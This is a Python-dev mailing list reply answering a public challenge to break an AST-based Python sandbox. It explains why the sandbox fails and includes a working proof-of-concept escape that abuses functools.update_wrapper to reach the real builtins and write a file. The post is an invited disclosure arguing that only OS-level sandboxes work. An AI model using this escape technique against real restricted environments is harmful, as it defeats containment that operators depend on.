[Python-Dev] Challenge: Please break this! (a.k.a restricted mode revisited)

Tue Apr 12 08:16:57 EDT 2016

2016-04-08 16:18 GMT+02:00 Jon Ribbens <jon+python-dev at unequivocal.co.uk>:
> I've made another attempt at Python sandboxing, which does something
> which I've not seen tried before - using the 'ast' module to do static
> analysis of the untrusted code before it's executed, to prevent most
> of the sneaky tricks that have been used to break out of past attempts
> at sandboxes.

Right, it blocks the most trivial attacks against sandboxes. But you
only fixed a few holes, they are still a wide area of holes to escape
your sandbox.

I read your code and the code of CPython. I found many issues.

Your sandbox runs untrusted code in a new namespace. The game is to
get access of the outter namespace, the real Python namespace. For
example, get the namespace of the unsafe module.

Your bet is that blocking access to "_" variables, using a whitelist
of modules and a few other protections is enough to block access to
the real namespace. The problem is that Python provides a very wide
range of tools for introspection.

I expected to find a hole using the C code, but in fact, it was much
simpler than that.

Your "safe import" hides real functions with a proxy. Ok. But the code
of modules is still run in the real namespace, where I expected that
modules run in the untrusted (restricted) namespace. The game is now
to find a way to retrieve content from the real namespace using any
function exposed in modules.

I found functools.update_wrapper(). I was very surprised because this
function calls getattr() and setattr(), whereas your sandbox replaces
these builtin functions. In fact, the "safe" getattr and setattr are
only installed in the untrusted namespace, and as I wrote, the modules
run in the real Python namespace.

> I would be very interested to see if anyone can manage to break it.

So here you have:
---
import functools

# any proxy function from unsafe.py
import base64
src = base64.main

# hack to get any attribute of an object
def getattr(obj, attr):
    secret = None

    class A:
        def __setattr__(self, key, value):
            nonlocal secret
            if key == attr:
                secret = value

    dst = A()
    functools.update_wrapper(dst, src, assigned=(attr,), updated=())
    return secret

builtins = getattr(base64.main, "__globals__")["__builtins__"]

fn = "/tmp/owned"
with builtins.open(fn, "w") as f:
    f.write("game over!\n")
---

The exploit is based on two things:

* update_wrapper() is used to get the secret attribute using the real
getattr() function
* update_wrapper() + A.__setattr__ are used to pass the secret from
the real namespace to the untrusted namespace

> Bugs which are trivially fixable are of course welcomed, but the real
> question is: is this approach basically sound, or is it fundamentally
> unworkable?

You can block the functools.update_wrapper(), or even the whole
functools module. But it will not fix the root cause: modules must run
in the untrusted namespace.

In pysandbox, I have code to ensure that all modules run in the
untrusted namespace: see CleanupBuiltins in sandbox/builtins.py. But
it was not enough, many vulnerabilities were found even with all my
protections.

I'm sure that many others will find other ways to escape your sandbox
with enough time. It's a matter of time, not a matter of whitelists.

As I wrote in my long explaning why pysandbox is broken by design,
writing a sandbox inside a CPython doesn't work. In fact, what you
want to restrict is the access to limited resources like CPU and
memory, and block access to the filesystem. This is the job of the
operating system, and external sandboxes help to block access to the
filesystem.

Victor